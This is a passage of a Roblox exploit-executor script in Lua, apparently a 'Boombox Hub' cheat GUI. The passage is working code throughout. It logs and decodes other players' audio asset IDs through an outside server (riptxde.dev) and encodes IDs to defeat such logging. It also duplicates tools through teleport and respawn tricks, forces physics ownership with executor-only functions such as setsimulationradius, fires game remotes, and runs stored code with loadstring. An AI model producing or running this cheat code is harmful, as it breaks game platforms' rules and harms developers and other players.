Tween(Button,.3,'Quint','InOut',{TextColor3 = Color3.fromRGB(100,100,100)}) end end) end, function(Button,X) C[#C+1] = Button['MouseButton1Click']:Connect(function() if Debounce then Debounce = false local Offset; if Button == TMenu['Scripts'] then Offset = .03 elseif Button == TMenu['Anti-Logger'] then Offset = .068 else Offset = .076 end Tween(TMenu['Selector'],.4,'Quint','InOut',{Position = Button['Position'] + UDim2.new(Offset,0,.774,0)}) Tween(Tabs,.6,'Quad','InOut',{Position = UDim2.new(X,0,0,0)}); wait(.6) Debounce = true end end) C[#C+1] = Button['MouseEnter']:Connect(function() Tween(Button,.3,'Quint','InOut',{TextColor3 = Color3.fromRGB(200,200,200)}) Button['MouseLeave']:Wait() Tween(Button,.3,'Quint','InOut',{TextColor3 = Color3.fromRGB(120,120,120)}) end) end MNavigate(Menu['Home'],0); MNavigate(Menu['Settings'],-1); MNavigate(Menu['Help'],-2); TNavigate(TMenu['Audio-Logger'],0); TNavigate(TMenu['Asset-Decoder'],-1); TNavigate(TMenu['Anti-Logger'],-2); TNavigate(TMenu['Scripts'],-3) local Logger, Decoder, AntiLog, Scripts = Tabs['Audio-Logger'], Tabs['Asset-Decoder'], Tabs['Anti-Logger'], Tabs['Scripts']; local Logged = Logger['Logged-Sounds']; local Template = Logged['TextButton']; Template['Parent'] = game:GetService('CorePackages'); Logged['UIListLayout'].Padding = UDim.new(0,5) local RArg, RButton, PButton, CId, CButton = 'PlaySong', Sectors['Settings']['Boombox-Type']['Standard'], Scripts['Preset'] local AddFunc = function(Type,Button,Func) if Type == 'Main' then local IColor, TColor = Button['Parent'].ImageColor3, Button['TextColor3'] C[#C+1] = Button['MouseButton1Click']:Connect(function() coroutine.wrap(Func)() Tween(Button['Parent'],.03,'Sine','Out',{ImageColor3 = Color3.fromRGB(22, 24, 27)}); wait(.03) Tween(Button['Parent'],.6,'Sine','Out',{ImageColor3 = IColor}) end) C[#C+1] = Button['MouseEnter']:Connect(function() Tween(Button,.3,'Quint','InOut',{TextColor3 = Default}) Button['MouseLeave']:Wait() Tween(Button,.3,'Quint','InOut',{TextColor3 = TColor}) end) elseif Type == 'Sounds' then local IColor, TColor = Button['Frame'].ImageColor3, Button['TextColor3'] C[#C+1] = Button['MouseButton1Click']:Connect(function() coroutine.wrap(Func)() Tween(Button['Frame'],.2,'Back','InOut',{ImageColor3 = Color3.fromRGB(22, 24, 27)}) SObject, CId, CButton = Button['Sound'].Value, Button['Sound'].Value['SoundId'], Button local T = Button['Parent']:GetChildren(); for I = 1,#T do local V = T[I] if V ~= CButton and not V:IsA('UIListLayout') and not V:IsA('UIPadding') then Tween(V['Frame'],.2,'Quad','InOut',{ImageColor3 = Color3.fromRGB(33, 37, 41)}) end end end) C[#C+1] = Button['MouseEnter']:Connect(function() Tween(Button,.3,'Quint','InOut',{TextColor3 = Default}) Button['MouseLeave']:Wait() Tween(Button,.3,'Quint','InOut',{TextColor3 = TColor}) end) elseif Type == 'Types' then local IColor, TColor = Button['Frame'].ImageColor3, Button['TextColor3'] C[#C+1] = Button['MouseButton1Click']:Connect(function() coroutine.wrap(Func)() Tween(Button['Frame'],.2,'Back','InOut',{ImageColor3 = Color3.fromRGB(22, 24, 27)}) RButton = Button local T = Button['Parent']:GetChildren(); for I = 1,#T do local V = T[I] if V ~= RButton and not V:IsA('UIListLayout') and not V:IsA('UIPadding') then Tween(V['Frame'],.2,'Quad','InOut',{ImageColor3 = Color3.fromRGB(33, 37, 41)}) end end end) C[#C+1] = Button['MouseEnter']:Connect(function() Tween(Button,.3,'Quint','InOut',{TextColor3 = Default}) Button['MouseLeave']:Wait() Tween(Button,.3,'Quint','InOut',{TextColor3 = TColor}) end) elseif Type == 'Presets' then local IColor, TColor = Button['Frame'].ImageColor3, Button['TextColor3'] C[#C+1] = Button['MouseButton1Click']:Connect(function() coroutine.wrap(Func)() Tween(Button['Frame'],.2,'Back','InOut',{ImageColor3 = Color3.fromRGB(22, 24, 27)}) PButton = Button local T = Button['Parent']:GetChildren(); for I = 1,#T do local V = T[I] if V ~= PButton and not V:IsA('UIListLayout') and not V:IsA('UIPadding') then Tween(V['Frame'],.2,'Quad','InOut',{ImageColor3 = Color3.fromRGB(33, 37, 41)}) end end end) C[#C+1] = Button['MouseEnter']:Connect(function() Tween(Button,.3,'Quint','InOut',{TextColor3 = Default}) Button['MouseLeave']:Wait() Tween(Button,.3,'Quint','InOut',{TextColor3 = TColor}) end) elseif Type == 'Commands' then local TColor = Button['TextColor3'] C[#C+1] = Button['MouseButton1Click']:Connect(function() coroutine.wrap(Func)() end) C[#C+1] = Button['MouseEnter']:Connect(function() Tween(Button,.3,'Quint','InOut',{TextColor3 = Default}) Button['MouseLeave']:Wait() Tween(Button,.3,'Quint','InOut',{TextColor3 = TColor}) end) end end local Escape, JSONEncode, JSONDecode = function(Input) return game:GetService('HttpService'):UrlEncode(Input) end, function(Input) return game:GetService('HttpService'):JSONEncode(Input) end, function(Input) return game:GetService('HttpService'):JSONDecode(Input) end local Encode, Decode = function(AssetId) if AssetId == nil then return; end local Response = Request({ Url = 'https://riptxde.dev/anti-logger-v2.php/?mode=false&id='..game:GetService('HttpService'):UrlEncode(AssetId); Method = 'GET'; })['Body'] if Response:match('^Error: ') then Notify(Response,7) elseif Response:match('^Notice: New location detected') then Notify(Response,20) wait(.8) Notify('Once you have your verification code, please use ;verify {code} in the command bar.',20) elseif Response:match('discord.gg/DMakTbZ') then Notify('You are not whitelisted, Playing via jack\'s free anti-steal [less secure].',4) wait(.4) local CustomMessage = '' if pcall(function() readfile('Boombox-Hub-Custom-Message.txt') end) then CustomMessage = readfile('Boombox-Hub-Custom-Message.txt') end return Response:gsub(' ', ' ' .. CustomMessage:gsub('%%', '%%%%') .. ' ') else coroutine.wrap(function() local Phase = function() return Request({ Url = 'https://riptxde.dev/anti-logger-v2.php/?mode=true&id='..game:GetService('HttpService'):UrlEncode(AssetId); Method = 'GET'; })['Body'] end wait(.06); Phase() end)() if pcall(function() readfile('Boombox-Hub-Custom-Message.txt') end) then return Response:format(readfile('Boombox-Hub-Custom-Message.txt'):gsub('[&#]','')) else return Response:format('') end end end, function(AssetId) local Prefix = AssetId:gsub('%s',''):lower() if not Prefix:match('^http://www.roblox.com/asset/%?id=') and not Prefix:match('^https://www.roblox.com/asset/%?id=') and not Prefix:match('^rbxassetid://') then AssetId = 'http://www.roblox.com/asset/?id='..AssetId end local Response = Request({ Body = 'soundid='..Escape(Escape(AssetId:gsub(' ',''))); Url = 'https://riptxde.dev/audio-logger-v2.php/'; Method = 'POST'; })['Body'] if Response:len() < 1 then Notify('Invalid parse. (B)',6) else if Response:match('^Error: ') then Notify(Response,7) elseif Response:match('^Notice: New location detected') then Notify(Response,20) wait(.8) Notify('Once you have your verification code, please use ;verify {code} in the command bar.',20) else return Response end end end local Ignore = { 'rbxasset://sounds/action_footsteps_plastic.mp3'; 'rbxasset://sounds/impact_water.mp3'; 'rbxasset://sounds/uuhhh.mp3'; 'rbxasset://sounds/action_swim.mp3'; 'rbxasset://sounds/action_get_up.mp3'; 'rbxasset://sounds/action_falling.mp3'; 'rbxasset://sounds/action_jump.mp3'; 'rbxasset://sounds/action_jump_land.mp3'; } local Sounds, IdSet, LToggle, Listening = {}, {}, false; Sounds.__mode = 'k' AddFunc('Main',Logger['Copy ID'].TextButton, function() if CId then everyClipboard(CId); Notify('Successfully set raw asset-id to clipboard.',4) end end) AddFunc('Main',Logger['Write ID To File'].TextButton, function() if CId then if not isfolder('RH-LoggedIds') then makefolder('RH-LoggedIds') end writefile('RH-LoggedIds/Id-'..(#listfiles('RH-LoggedIds')+1)..'.txt',CId) Notify('Successfully wrote raw asset-id to file: workspace/RH-LoggedIds/Id-'..(#listfiles('RH-LoggedIds'))..'.txt',6) end end) AddFunc('Main',Logger['Send ID to Decoder'].TextButton,function() if CId then if not RL then return end; RL = false local AssetId; AssetId = Decode(CId) if AssetId then Decoder['Asset-Id'].TextBox['Text'] = AssetId Tween(TMenu['Selector'],.4,'Quint','InOut',{Position = TMenu['Asset-Decoder']['Position'] + UDim2.new(.076,0,.774,0)}) Tween(Tabs,.6,'Quad','InOut',{Position = UDim2.new(-1,0,0,0)}); wait(.6) Notify('Successfully decoded asset-id.',4) end RL = true end end) AddFunc('Main',Logger['Listen'].TextButton,function() if CId then LToggle = not LToggle if LToggle then Listening = Create('Sound',{ SoundId = CId; Looped = true; Parent = game:GetService('CorePackages'); }) Listening:Play() Logger['Listen'].TextButton['Text'] = 'Stop' elseif Listening and type(Listening) == 'userdata' then Listening:Destroy() Logger['Listen'].TextButton['Text'] = 'Listen' end end end) AddFunc('Main',Logger['Put ID in Ignore List'].TextButton,function() if CId then Ignore[#Ignore+1] = CId end end) AddFunc('Main',Logger['Clear All'].TextButton,function() Sounds, IdSet = {}, {}; Sounds.__mode = 'k' CButton, SObject, CId = nil,nil,nil local T = Logged:GetChildren(); for I = 1,#T do local V = T[I] if not V:IsA('UIListLayout') and not V:IsA('UIPadding') then coroutine.wrap(function() Tween(V,.2,'Quad','Out',{TextTransparency = 1}) Tween(V['Frame'],.2,'Quad','Out',{ImageTransparency = 1}) wait(.2); V:Destroy() end)() end end Tween(Logged,.2,'Quad','InOut',{CanvasSize = UDim2.new(0,0,2,0)}) end) AddFunc('Main',Logger['Scan Workspace'].TextButton, function() local T = game:GetService("Workspace"):GetDescendants() for I = 1,#T do local V = T[I] if V:IsA('Sound') then if V['IsLoaded'] ~= false and not table.find(Ignore,V['SoundId']) and not table.find(Sounds,V) and not table.find(IdSet,V['SoundId']) then coroutine.wrap(function() local Clone = Template:Clone() Clone['TextTransparency'] = 1; Clone['Frame'].ImageTransparency = 1 Bool,Info = pcall(function() return game:GetService('MarketplaceService'):GetProductInfo(V['SoundId']:gsub('rbxassetid://','',1):gsub('http://www.roblox.com/asset/%?id=','',1):gsub('https://www.roblox.com/asset/%?id=','',1)) end) if Bool then Clone['Text'] = Info['Name'] elseif V['SoundId']:match('^rbxasset://sounds/') then Clone['Text'] = V['SoundId']:gsub('rbxasset://sounds/','',1) else Clone['Text'] = V['Name'] end Clone['Sound'].Value = V Tween(Clone,.2,'Quad','Out',{TextTransparency = 0}) Tween(Clone['Frame'],.2,'Quad','Out',{ImageTransparency = 0}) Tween(Logged,.2,'Quad','InOut',{CanvasSize = UDim2.new(0,0,0,Logged['UIListLayout'].AbsoluteContentSize['Y'] * 2)}) Clone['Parent'] = Logged AddFunc('Sounds',Clone,function() Logger['Asset-Id Preview'].TextBox['Text'] = V['SoundId'] end) end)() Sounds[#Sounds+1] = V; IdSet[#IdSet+1] = V['SoundId'] end end if I % 1080 == 0 then game:GetService('RunService')['Heartbeat']:Wait() end end end) AddFunc('Main',Logger['Scan Game'].TextButton, function() local T = game:GetDescendants() for I = 1,#T do local V = T[I] if V:IsA('Sound') then if V['IsLoaded'] ~= false and not table.find(Ignore,V['SoundId']) and not table.find(Sounds,V) and not table.find(IdSet,V['SoundId']) then coroutine.wrap(function() local Clone = Template:Clone() Clone['TextTransparency'] = 1; Clone['Frame'].ImageTransparency = 1 Bool,Info = pcall(function() return game:GetService('MarketplaceService'):GetProductInfo(V['SoundId']:gsub('rbxassetid://','',1):gsub('http://www.roblox.com/asset/%?id=','',1):gsub('https://www.roblox.com/asset/%?id=','',1)) end) if Bool then Clone['Text'] = Info['Name'] elseif V['SoundId']:match('^rbxasset://sounds/') then Clone['Text'] = V['SoundId']:gsub('rbxasset://sounds/','',1) else Clone['Text'] = V['Name'] end Clone['Sound'].Value = V Tween(Clone,.2,'Quad','Out',{TextTransparency = 0}) Tween(Clone['Frame'],.2,'Quad','Out',{ImageTransparency = 0}) Tween(Logged,.2,'Quad','InOut',{CanvasSize = UDim2.new(0,0,0,Logged['UIListLayout'].AbsoluteContentSize['Y'] * 2)}) Clone['Parent'] = Logged AddFunc('Sounds',Clone,function() Logger['Asset-Id Preview'].TextBox['Text'] = V['SoundId'] end) end)() Sounds[#Sounds+1] = V; IdSet[#IdSet+1] = V['SoundId'] end end if I % 1080 == 0 then game:GetService('RunService')['Heartbeat']:Wait() end end end) local Presets; if not pcall(function() Presets = JSONDecode(readfile('Boombox-Hub-Presets.dat')) assert(Presets['circle'] ~= nil) end) then writefile('Boombox-Hub-Presets.dat', JSONEncode({ ['circle'] = [=[for K,V in next, Tools do coroutine.wrap(function() local BP, BG, PCF = V['VPosition'].Value, V['VGyro'].Value while Selected['Playing'] do local I, Vol = 1, 0 repeat Vol = Selected['PlaybackLoudness'] PRY = math.rad(I+(K*(360/#Tools))) PZ = OffsetSensitivity + Vol / (Sensitivity ~= 100 and (100 - Sensitivity) or .01) GY = OffsetTiltSensitivity + Vol / (TiltSensitivity ~= 100 and (100 - TiltSensitivity) or .01) PCF = CFrame.new(Root['Position']) * CFrame.Angles(0,PRY,0) * CFrame.new(0,0,PZ) BP['Position'] = PCF.p BG['CFrame'] = CFrame.new(BG['Parent'].Position, Root['Position'] + Vector3.new(0, GY, 0)) I = I + Speed game:GetService('RunService')['RenderStepped']:Wait() until I >= 360 or not Selected['Playing'] end end)() end]=]; ['line'] = [=[for K,V in next, Tools do coroutine.wrap(function() local BP, BG, PCF = V['VPosition'].Value, V['VGyro'].Value while Selected['Playing'] do local I, Vol = 1, 0 repeat if K == 1 then Samples[#Samples+1] = Selected['PlaybackLoudness'] end Vol = (Samples[#Samples - (K-1)] or 0) / (Sensitivity ~= 100 and (100 - Sensitivity) or .01) BP['Position'] = Root['Position'] + Vector3.new(K * 1.6,Vol + OffsetSensitivity,0) I = I + Speed game:GetService('RunService')['RenderStepped']:Wait() until I >= 360 or not Selected['Playing'] end end)() end]=]; })) Presets = JSONDecode(readfile('Boombox-Hub-Presets.dat')) end local PTemplate, CPreset = Scripts['Preset'].Circle, Presets['circle'] for K,V in next, Presets do Clone = PTemplate:Clone() Clone['Text'] = K Clone['Name'] = K AddFunc('Presets',Clone,function() CPreset = V end) Clone['Parent'] = Scripts['Preset'] Tween(Scripts['Preset'],.2,'Quad','InOut',{CanvasSize = UDim2.new(0,0,0,Scripts['Preset'].UIListLayout['AbsoluteContentSize'].Y * 2)}) end PTemplate['Parent'] = game:GetService('CorePackages') AddFunc('Types',Sectors['Settings']['Boombox-Type']['Da Hood'],function() RArg = 'Boombox' writefile('Boombox-Hub-Settings.dat', JSONEncode({ Type = 'Da Hood'; Mode = RArg; Color = tostring(Default); })) end) AddFunc('Main',Decoder['Decode'].TextButton,function() if not RL then return end; RL = false local AssetId; AssetId = Decode(Decoder['Asset-Id'].TextBox['Text']) if AssetId then Decoder['Asset-Id'].TextBox['Text'] = AssetId Notify('Successfully decoded asset-id.',4) end RL = true end) AddFunc('Main',Decoder['Decode File'].TextButton,function() if not RL then return end; RL = false local Content; if pcall(function() Content = readfile(Decoder['Asset-Id'].TextBox['Text']):gsub(' ','') end) then local AssetId; AssetId = Decode(Content) if AssetId then Decoder['Asset-Id'].TextBox['Text'] = AssetId Notify('Successfully decoded asset-id.',4) end end RL = true end) AddFunc('Main',Decoder['Copy ID'].TextButton,function() if Decoder['Asset-Id'].TextBox['Text']:len() > 0 then everyClipboard(Decoder['Asset-Id'].TextBox['Text']) Notify('Successfully copied asset-id to clipboard.',4) end end) local ToClock = function(Seconds) if Seconds < 1 then return '0:00'; else local Mins = ('%2.f'):format(math.floor(Seconds/60)); local Secs = ('%02.f'):format(math.floor(Seconds - Mins*60)); return Mins..':'..Secs end end local LP, Playing, Tool = game:GetService('Players')['LocalPlayer'] local RN = Random.new() local LatentYield = function(N) local Index = 0 repeat game['RobloxReplicatedStorage'].GetServerVersion:InvokeServer() Index = Index + 1 until Index >= N end local CancelDupe = false local DupeTools = function(Num) CancelDupe = false local Estimate = (game:GetService('Players')['RespawnTime'] + 1) * (Num + 1) local Tools, Type, RCF = {}, workspace['CurrentCamera'].CameraType for I = 1,Num + 1 do if I <= Num then Notify(('Approximately %s seconds until dupe is complete.'):format(math.round(Estimate - (game:GetService('Players')['RespawnTime'] + 1) * I)),1) end local Char = LP['Character'] local Root = Char:FindFirstChild('HumanoidRootPart') while not Root do Char['ChildAdded']:Wait() Root = Char:FindFirstChild('HumanoidRootPart') end if I == 1 then RCF = Root['CFrame'] end LatentYield(2.0) if I > Num or CancelDupe then for K,V in next, Tools do V['Anchored'] = false V['CFrame'] = Root['CFrame'] LatentYield(1.0) end Notify('Dupe-Tools complete.',3) Root['CFrame'] = RCF break end LatentYield(2.0) for IDX = 1,10 do for K,V in next, LP['Backpack']:GetChildren() do if V:IsA('Tool') then V['Parent'] = Char end end game:GetService('RunService')['Heartbeat']:Wait() end Root['CFrame'] = CFrame.new(RN:NextInteger(-3.0e4, 3.0e4),5.0e5,RN:NextInteger(-3.0e4, 3.0e4)) LatentYield(2.0) Char['Head'].Anchored = true for K,V in next, LP['Character']:GetChildren() do if V:IsA('Tool') and V['Handle'] then V['Parent'] = workspace V['Handle'].Anchored = true Tools[#Tools+1] = V['Handle'] end end (Char:FindFirstChild('Torso') or Char:FindFirstChild('UpperTorso')):Destroy() local Con = Char['ChildAdded']:Connect(function(V) if V:IsA('Tool') then game:GetService('RunService')['Heartbeat']:Wait() V['Parent'] = workspace V['Handle'].Anchored = true end end) LP['CharacterAdded']:Wait() Con:Disconnect() end end settings()['Physics'].AllowSleep = false settings()['Physics'].PhysicsEnvironmentalThrottle = Enum['EnviromentalPhysicsThrottle'].Disabled if not NK then G['NK'] = true if type(setsimulationradius) == 'function' then coroutine.wrap(function() repeat game:GetService('RunService')['RenderStepped']:Wait() setsimulationradius(1/0, 1/0) until not NK end)() elseif type(sethiddenproperty) == 'function' then coroutine.wrap(function() repeat game:GetService('RunService')['RenderStepped']:Wait() sethiddenproperty(LP, 'MaximumSimulationRadius', 1/0) sethiddenproperty(LP, 'SimulationRadius', 1/0) until not NK end)() elseif type(set_hidden_prop) == 'function' then coroutine.wrap(function() repeat game:GetService('RunService')['RenderStepped']:Wait() set_hidden_prop(LP, 'MaximumSimulationRadius', 1/0) set_hidden_prop(LP, 'SimulationRadius', 1/0) until not NK end)() else Notify('Your exploit does not have certain functions, the Visualizer may not work as expected.',7) end end local Visualize = function(AssetId) Scripts['Asset-Id'].TextBox['TextEditable'], RL = false, false if pcall(function() Playing = game:GetService('MarketplaceService'):GetProductInfo(AssetId)['Name'] end) then Scripts['Asset-Id'].TextBox['TextEditable'], RL = true, true; Notify(('Play: Attempting to visualize %s under boombox settings: "%s"'):format(Playing, RButton['Name'] or 'Standard'),7) else Scripts['Asset-Id'].TextBox['TextEditable'], RL = true, true; Notify('Error: Invalid id given.',4) end local Char = LP['Character'] local Humanoid = Char:FindFirstChildOfClass('Humanoid') Humanoid:ChangeState(2) LatentYield(1.0) local Root = Char['HumanoidRootPart'] local Tools, Forces = {}, {} Humanoid:UnequipTools() repeat for K,V in next, Forces do V:Destroy() table.remove(Forces, K) end until #Forces == 0 for K,V in next, LP['Backpack']:GetChildren() do if V:IsA('Tool') then V['Parent'] = Char end end for K,V in next, Char:GetChildren() do if V:IsA('Tool') and V['Handle'] then Tools[#Tools+1] = V end end for K,V in next, Char:GetDescendants() do if V['Name'] == 'RightGrip' then V:Destroy() end end LatentYield(2.0) for K,V in next, Tools do local BP = Create('BodyPosition',{ MaxForce = Vector3.new(1/0,1/0,1/0); Position = V['Handle'].Position; P = 1.0e5; }) Forces[#Forces+1] = BP BP['Parent'] = V['Handle'] local BG = Create('BodyGyro',{ MaxTorque = Vector3.new(1/0,1/0,1/0); P = 1.0e4; Parent = V['Handle']; }) Forces[#Forces+1] = BG BG['Parent'] = V['Handle'] local BPO = Create('ObjectValue',{ Value = BP; Name = 'VPosition'; Parent = V; }) Forces[#Forces+1] = BPO BPO['Parent'] = V local BGO = Create('ObjectValue',{ Value = BG; Name = 'VGyro'; Parent = V; }) Forces[#Forces+1] = BGO BGO['Parent'] = V V['Parent'] = Char end for K,V in next, Char:GetDescendants() do if V['Name'] == 'RightGrip' then V:Destroy() end end local Encoded = Encode(AssetId) if Encoded then AssetId = Encoded end for K,V in next, Humanoid:GetPlayingAnimationTracks() do V:Stop() end local Current = 0 for K,V in next, Tools do if Current <= MassPlayLimit then coroutine.resume(coroutine.create(function() Remote = (RArg == 'Boombox' and game:GetService('ReplicatedStorage')['MainEvent'] or V:FindFirstChildOfClass('RemoteEvent')) Remote:FireServer(RArg,AssetId) Current = Current + 1 end)) end end local Selected = nil; repeat for A,B in next, Tools do local T = B:GetDescendants() for I = 1,#T do local V = T[I] if V:IsA('Sound') then if V['Playing'] and V['TimeLength'] ~= 0 and V['IsLoaded'] then Selected = V end end end end wait(.06) until Selected or Char:FindFirstChildOfClass('Tool') == nil if Char:FindFirstChildOfClass('Tool') == nil then repeat for K,V in next, Forces do V:Destroy() table.remove(Forces, K) end until #Forces == 0 Humanoid:UnequipTools() return; end G['Tools'], G['Selected'], G['Root'], G['Samples'], G['Forces'] = Tools, Selected, Root, {}, Forces TPos = tonumber(Scripts['Time-Position'].TextBox['Text']) or 0 if not RFE then for K,V in next, Char:GetDescendants() do if V:IsA('Sound') then V['TimePosition'] = TPos end end end local PFunc = loadstring(CPreset or Presets['circle']) if G['ExperimentalMode'] then PFunc() else pcall(PFunc) end repeat game:GetService('RunService')['Heartbeat']:Wait() until not Selected['Playing'] Humanoid:UnequipTools() repeat for K,V in next, Forces do V:Destroy() table.remove(Forces, K) end until #Forces == 0 end AddFunc('Main',Scripts['Dupe-Tools'].TextButton,function() DupeTools(tonumber(Scripts['Dupe-Amount'].TextBox['Text']) or 1) end) AddFunc('Main',Scripts['Visualize'].TextButton,function() Visualize(Scripts['Asset-Id'].TextBox['Text']) end) AddFunc('Main',AntiLog['Play'].TextButton,function() if not RL then return end AntiLog['Asset-Id'].TextBox['TextEditable'], RL = false, false local AssetId = Encode(AntiLog['Asset-Id'].TextBox['Text']) if AssetId == nil then AntiLog['Asset-Id'].TextBox['TextEditable'], RL = true, true; return end local Boombox = LP['Character']:FindFirstChildOfClass('Tool') if Boombox == nil then Notify('Error: User is not holding boombox.',4); AntiLog['Asset-Id'].TextBox['TextEditable'], RL = true, true; return end if not pcall(function() Remote, Tool = (RArg == 'Boombox' and game:GetService('ReplicatedStorage')['MainEvent'] or Boombox:FindFirstChildOfClass('RemoteEvent')), (RArg == 'Boombox' and LP['Character'].LowerTorso or Boombox) Remote:FireServer(RArg,AssetId) end) then Notify('Error: Boombox is not compatible, check the Settings tab.',7); AntiLog['Asset-Id'].TextBox['TextEditable'], RL = true, true; return end if pcall(function() Playing = game:GetService('MarketplaceService'):GetProductInfo(AntiLog['Asset-Id'].TextBox['Text'])['Name'] end) then AntiLog['Asset-Id'].TextBox['TextEditable'], RL = true, true; Notify(('Play: Attempting to play %s under boombox settings: "%s"'):format(Playing, RButton['Name'] or 'Standard'),7) else AntiLog['Asset-Id'].TextBox['TextEditable'], RL = true, true; Notify('Error: Invalid id given.',4) end end) AddFunc('Main',AntiLog['Backpack-Play'].TextButton,function() if not RL then return end if RFE then Notify('Error: RFE is enabled on this game.',4); return end if RArg == 'Boombox' then Notify('Backpack-Play is not functional on Da Hood.',4); return end AntiLog['Asset-Id'].TextBox['TextEditable'] = false local AssetId = Encode(AntiLog['Asset-Id'].TextBox['Text']) if AssetId == nil then AntiLog['Asset-Id'].TextBox['TextEditable'], RL = true, true; return end local Boombox = LP['Character']:FindFirstChildOfClass('Tool') if Boombox == nil then Notify('Error: User is not holding boombox.',4); AntiLog['Asset-Id'].TextBox['TextEditable'], RL = true, true; return end Tool = Boombox; if not pcall(function() Boombox:FindFirstChildOfClass('RemoteEvent'):FireServer(RArg, AssetId) wait(.6) local Selected = nil; repeat local T = Tool:GetDescendants() for I = 1,#T do local V = T[I] if V:IsA('Sound') then if V['Playing'] and V['TimeLength'] ~= 0 and V['IsLoaded'] then Selected = V end end end wait(.06) until Selected Selected['Parent'] = game:GetService('CorePackages') LP['Character']:FindFirstChildOfClass('Humanoid'):UnequipTools() wait(.6) Selected['Parent'] = Tool; Selected:Play() coroutine.wrap(function() Selected['AncestryChanged']:Wait() if Selected then Selected:Stop() end end)() end) then Notify('Error: Boombox is not compatible, check the Settings tab.',7); AntiLog['Asset-Id'].TextBox['TextEditable'], RL = true, true; return end if pcall(function() Playing = game:GetService('MarketplaceService'):GetProductInfo(AntiLog['Asset-Id'].TextBox['Text'])['Name'] end) then AntiLog['Asset-Id'].TextBox['TextEditable'], RL = true, true; Notify(('Play: Attempting to backpack-play %s under boombox settings: "%s"'):format(Playing, RButton['Name'] or 'Standard'),7) else AntiLog['Asset-Id'].TextBox['TextEditable'], RL = true, true; Notify('Error: Invalid id given.',4) end end) AddFunc('Main',AntiLog['Copy ID'].TextButton,function() if not RL then return end local AssetId = Encode(AntiLog['Asset-Id'].TextBox['Text']) if AssetId then everyClipboard(AssetId); Notify('Successfully copied encoded asset-id to clipboard.',4) end RL = true end) local HDelay = true; C[#C+1] = game:GetService('RunService')['Heartbeat']:Connect(function() if HDelay then HDelay = false if Tool and Tool['Parent'] then local T, Selected = Tool:GetDescendants() for I = 1,#T do local V = T[I] if V:IsA('Sound') then if V['Playing'] and V['TimeLength'] ~= 0 and V['IsLoaded'] then Selected = V end end end if Selected and Playing then if not RFE then AntiLog['Current-Time'].TextEditable = true end Tween(AntiLog['Song-Length'].Mover,.08,'Quad','Out',{Position = UDim2.new(Selected['TimePosition']/Selected['TimeLength'],0,-5,0)}) AntiLog['Title'].Text = 'Playing: '..Playing if not AntiLog['Current-Time']:IsFocused() then AntiLog['Current-Time'].Text = ToClock(Selected['TimePosition']) end AntiLog['Total-Time'].Text = ToClock(Selected['TimeLength']) else AntiLog['Current-Time'].TextEditable = false AntiLog['Title'].Text = 'Playing: Nothing' AntiLog['Current-Time'].Text = '0:00' AntiLog['Total-Time'].Text = '0:00' if AntiLog['Song-Length'].Mover['Position'] ~= UDim2.new(0,0,-5,0) then Tween(AntiLog['Song-Length'].Mover,.08,'Quad','Out',{Position = UDim2.new(0,0,-5,0)}) wait(.08) end end else AntiLog['Current-Time'].TextEditable = false AntiLog['Title'].Text = 'Playing: Nothing' AntiLog['Current-Time'].Text = '0:00' AntiLog['Total-Time'].Text = '0:00' if AntiLog['Song-Length'].Mover['Position'] ~= UDim2.new(0,0,-5,0) then Tween(AntiLog['Song-Length'].Mover,.08,'Quad','Out',{Position = UDim2.new(0,0,-5,0)}) wait(.08) end end HDelay = true end end) AntiLog['Current-Time'].FocusLost:Connect(function(Enter) if Enter and Tool and Tool['Parent'] and not RFE then local T, Selected = Tool:GetDescendants() for I = 1,#T do local V = T[I] if V:IsA('Sound') then if V['Playing'] and V['TimeLength'] ~= 0 and V['IsLoaded'] then Selected = V end end end if Selected and Playing then local Time = AntiLog['Current-Time'].Text if tonumber(Time) then Selected['TimePosition'] = tonumber(Time) elseif Time:match(':') then local Split = Time:split(':') local Mins, Secs = Split[1], Split[2] Selected['TimePosition'] = (tonumber(Mins)*60) + tonumber(Secs) end end end end) local Data, RColor; if pcall(function() readfile('Boombox-Hub-Settings.dat') end) then Data = JSONDecode(readfile('Boombox-Hub-Settings.dat')) else writefile('Boombox-Hub-Settings.dat', JSONEncode({ Type = RButton['Name'] or 'Standard'; Mode = RArg; Color = tostring(Default); })) Data = JSONDecode(readfile('Boombox-Hub-Settings.dat')) end if not pcall(function() RButton, RArg, RColor = Sectors['Settings']['Boombox-Type'][Data.Type], Data['Mode'], Color3.new(unpack(Data['Color']:gsub('%s',''):split(','))) end) then writefile('Boombox-Hub-Settings.dat', JSONEncode({ Type = RButton['Name'] or 'Standard'; Mode = RArg; Color = tostring(Default); })) Data = JSONDecode(readfile('Boombox-Hub-Settings.dat')) RButton, RArg, RColor = Sectors['Settings']['Boombox-Type'][Data.Type], Data['Mode'], Color3.new(unpack(Data['Color']:gsub('%s',''):split(','))) end Default = RColor for K,V in next, CBackground do V['BackgroundColor3'] = Default end for K,V in next, CImage do V['ImageColor3'] = Default end for K,V in next, CText do V['TextColor3'] = Default end for K,V in next, CScroll do V['ScrollBarImageColor3'] = Default end if pcall(function() readfile('Boombox-Hub-Custom-Message.txt') end) then Sectors['Settings']['Custom-Message'].TextBox['Text'] = readfile('Boombox-Hub-Custom-Message.txt') end Tween(RButton['Frame'],.2,'Back','InOut',{ImageColor3 = Color3.fromRGB(22, 24, 27)}) local T = RButton['Parent']:GetChildren(); for I = 1,#T do local V = T[I] if V ~= RButton and not V:IsA('UIListLayout') and not V:IsA('UIPadding') then Tween(V['Frame'],.2,'Quad','InOut',{ImageColor3 = Color3.fromRGB(33, 37, 41)}) end end AddFunc('Types',Sectors['Settings']['Boombox-Type']['Standard'],function() RArg = 'PlaySong' writefile('Boombox-Hub-Settings.dat', JSONEncode({ Type = 'Standard'; Mode = RArg; Color = tostring(Default); })) end) AddFunc('Types',Sectors['Settings']['Boombox-Type']['The Streets'],function() RArg = 'play' writefile('Boombox-Hub-Settings.dat', JSONEncode({ Type = 'The Streets'; Mode = RArg; Color = tostring(Default); })) end) AddFunc('Types',Sectors['Settings']['Boombox-Type']['Da Hood'],function() RArg = 'Boombox' writefile('Boombox-Hub-Settings.dat', JSONEncode({ Type = 'Da Hood'; Mode = RArg; Color = tostring(Default); })) end) AddFunc('Main',Sectors['Settings'].Reset['TextButton'],function() Default = Color3.fromRGB(217,60,56) for K,V in next, CBackground do Tween(V,.3,'Quint','InOut',{BackgroundColor3 = Default}) end for K,V in next, CImage do Tween(V,.3,'Quint','InOut',{ImageColor3 = Default}) end for K,V in next, CText do Tween(V,.3,'Quint','InOut',{TextColor3 = Default}) end for K,V in next, CScroll do Tween(V,.3,'Quint','InOut',{ScrollBarImageColor3 = Default}) end writefile('Boombox-Hub-Settings.dat', JSONEncode({ Type = RButton['Name']; 